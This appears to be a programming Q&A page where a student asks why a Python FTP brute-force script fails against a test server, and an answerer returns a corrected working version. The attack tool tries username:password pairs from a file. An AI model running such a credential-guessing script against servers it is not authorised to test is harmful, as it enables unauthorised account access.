Reputation: 13
Python FTP brute forcing
I am working on a school coding project that will use a python script to brute force an FTP server using a text document. This is what I have:
from ftplib import FTP
from optparse import OptionParser
def brute(host, username, password):
try:
ftp = FTP(host)
ftp.login(username, password)
ftp.retrlines('LIST')
print ('Ftp server connected using the provided username "' + username + '" and password "' + password + '"')
ftp.quit()
except:
print ('Could not connect to the ftp server using the provided username "' + username + '" and password "' + password + '"')
def main():
parser = OptionParser(usage="usage: python3 <program name>.py -H <target IP -P <password file>")
parser.add_option("-H", type="string",
help="Enter target host IP",
dest="targetHost")
parser.add_option("-P", type="string",
help="Enter password file",
dest="passFile")
(options, args) = parser.parse_args()
with open(options.passFile) as f:
content = f.readlines()
content = [x.split(':') for x in content]
username = []
password = []
i = 0
for x in range(len(content)):
username.append(content[i][0])
password.append(content[i][1])
i += 1
password = [x.replace('\n', '') for x in password]
f.close()
for x in range(len(username)):
brute(options.targetHost, username[x], password[x])
main()
The text document comes in a format like username:password. To test it, I have to setup an FTP server, which I did. After I setup the FTP server and ran the script it worked, but it did not actually connect me to the FTP server, rather it gave me my except print. I've been trying to configure my FTP server for a while now, trying to get it to work, but its the same result. So I want to know if my script is the problem or if I just didn't configure my FTP server correctly. If it is my script that is the problem, could somebody point out what it is, otherwise if my script is fine, then would somebody be willing to link to a site that shows how to setup and configure an FTP server for Windows 2008 or Linux? Thanks in advance.
Upvotes: 1
Views: 4306
Answers (1)
Reputation: 142889
#!/usr/bin/env python3
from ftplib import FTP
from optparse import OptionParser
def brute(host, username, password):
try:
ftp = FTP(host)
ftp.login(username, password)
ftp.retrlines('LIST')
print ('Ftp server connected using the provided username "' + username + '" and password "' + password + '"')
ftp.quit()
except:
print ('Could not connect to the ftp server using the provided username "' + username + '" and password "' + password + '"')
def main():
parser = OptionParser(usage="usage: python3 <program name>.py -t <target IP> -p <password file>")
parser.add_option("-t", type="string",
help="Enter target host IP",
dest="targetHost")
parser.add_option("-p", type="string",
help="Enter password file",
dest="passFile")
(options, args) = parser.parse_args()
if not options.passFile or not options.targetHost:
parser.print_help()
else:
with open(options.passFile) as f:
data = [ line.strip().split(':') for line in f ]
for username, password in data:
brute(options.targetHost, username, password)
main()
--
With line #!/usr/bin/env python3 (called hashbang - # = hash, ! = bang)
I can run script directly
bash$ my_script.py
or
bash$ ./my_script.py
(but first I have to set it executable chmod +x my_script.py)
I can even remove .py and it will work
bash$ my_script
or
bash$ ./my_script
--
Most programs use lowercase arguments and I prefer it so I use -t and -p
--
OptionParser didn't check whether arguments were used.
--
Last part of code can be also
with open(options.passFile) as f:
for line in f:
username, password = line.strip().split(':')
brute(options.targetHost, username, password)
Upvotes: 2
Related Questions
- Going through ftp directories in python
- Failing to FTP with python (badly)
- Python FTP code sample
- Python programming with FTP and lists
- Download Files From FTP Server Using Regular Expression
- how to read a file on ftp with python?
- It is possible to search in files on ftp in Python?
- Retrieve file/s from FTP using Python connection
- Python FTP query
- Python ftp bruteforcer not working